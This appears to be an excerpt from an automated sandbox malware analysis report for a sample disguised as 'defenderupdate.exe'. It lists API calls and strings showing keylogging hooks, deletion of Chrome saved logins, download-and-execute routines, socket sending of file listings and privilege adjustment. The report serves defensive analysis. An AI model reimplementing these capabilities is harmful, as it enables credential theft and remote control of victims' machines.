                                                                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                Strings
                                                                                                • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                • API String ID: 3219506041-952744263
                                                                                                • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                                • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                                • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                APIs
                                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                  • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                • API String ID: 2281282204-3981147832
                                                                                                • Opcode ID: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                                                                • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                • Opcode Fuzzy Hash: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                                                                • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                • GetLastError.KERNEL32 ref: 0040B261
                                                                                                Strings
                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                • UserProfile, xrefs: 0040B227
                                                                                                • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                • API String ID: 2018770650-1062637481
                                                                                                • Opcode ID: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                                                                • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                • Opcode Fuzzy Hash: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                                                                • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                • GetLastError.KERNEL32 ref: 00416B02
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3534403312-3733053543
                                                                                                • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                                                  • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                • String ID:
                                                                                                • API String ID: 4043647387-0
                                                                                                • Opcode ID: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                                                                • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                • Opcode Fuzzy Hash: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                                                                • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                • String ID:
                                                                                                • API String ID: 276877138-0
                                                                                                • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                APIs
                                                                                                  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                • API String ID: 1589313981-1420736420
                                                                                                • Opcode ID: dbe2315887bba6ce4f894fc1155da3ca588fd34dbc6ce905beef225a72b0054e
                                                                                                • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                • Opcode Fuzzy Hash: dbe2315887bba6ce4f894fc1155da3ca588fd34dbc6ce905beef225a72b0054e
                                                                                                • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                                                • GetACP.KERNEL32 ref: 004512BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID: SETTINGS
                                                                                                • API String ID: 3473537107-594951305
                                                                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID:
                                                                                                • API String ID: 745075371-0
                                                                                                • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 1157919129-0
                                                                                                • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                • String ID: C:\Users\user\AppData\Roaming\defenderupdate.exe$open
                                                                                                • API String ID: 2825088817-4223157313
                                                                                                • Opcode ID: 6e9ed81df7592736f00ea2213c3013647c852b2a2a077cd37a63e9025159bc8b
                                                                                                • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                • Opcode Fuzzy Hash: 6e9ed81df7592736f00ea2213c3013647c852b2a2a077cd37a63e9025159bc8b
                                                                                                • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                • String ID: x@G$x@G
                                                                                                • API String ID: 4113138495-3390264752
                                                                                                • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                                • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                                • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                  • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                  • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                                • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                                • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                  • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                  • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: 71d1e5c445f68871914c285a29d0046b246b6ade461d972b8fac6679235b0182
                                                                                                • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                                                • Opcode Fuzzy Hash: 71d1e5c445f68871914c285a29d0046b246b6ade461d972b8fac6679235b0182
                                                                                                • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 4212172061-0
                                                                                                • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00448067
                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                • String ID:
                                                                                                • API String ID: 806657224-0
                                                                                                • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                                                • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                APIs
                                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                Memory Dump Source
